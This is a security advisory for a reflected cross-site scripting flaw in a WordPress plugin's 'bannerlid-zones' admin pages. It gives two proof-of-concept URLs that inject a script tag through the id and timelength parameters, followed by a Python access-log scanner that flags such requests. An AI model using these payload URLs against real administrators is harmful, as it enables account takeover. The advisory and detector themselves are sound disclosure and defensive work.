Description

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.

Have an admin open URLs:

- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength="><script>alert(1)<%2Fscript>
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id="><script>alert(1)<%2Fscript>
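
For detection, the following added example (not part of the advisory or the plugin's code) scans web server access logs for requests to the affected admin page whose query parameters decode to attribute-breakout characters. It assumes combined-format access logs; the sample log lines are constructed, and checking every parameter rather than only `id` and `timelength` is a generalization beyond the two URLs above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value close a quoted attribute or open a tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "bannerlid-zones"  # admin page slug from the advisory URLs

def decode_fully(value, rounds=3):
    """Undo layered percent-encoding (%2522 -> %22 -> ")."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Names of query parameters on the plugin's admin page whose decoded
    value contains attribute-breakout characters; [] for a clean line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return []
    params = parse_qsl(url.query, keep_blank_values=True)
    if dict(params).get("page") != PLUGIN_PAGE:
        return []
    return sorted({k for k, v in params if BREAKOUT.search(decode_fully(v))})

def scan(lines):
    """Return (line_number, parameter_names) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = suspicious_params(line)
        if names:
            hits.append((number, names))
    return hits

# Constructed sample log lines (not real traffic); the payload is the advisory's own.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 4096',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=1 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious parameter(s) {', '.join(names)}")
```

A hit only shows that a crafted link was requested; whether it came from an administrator's session has to be correlated with authentication logs.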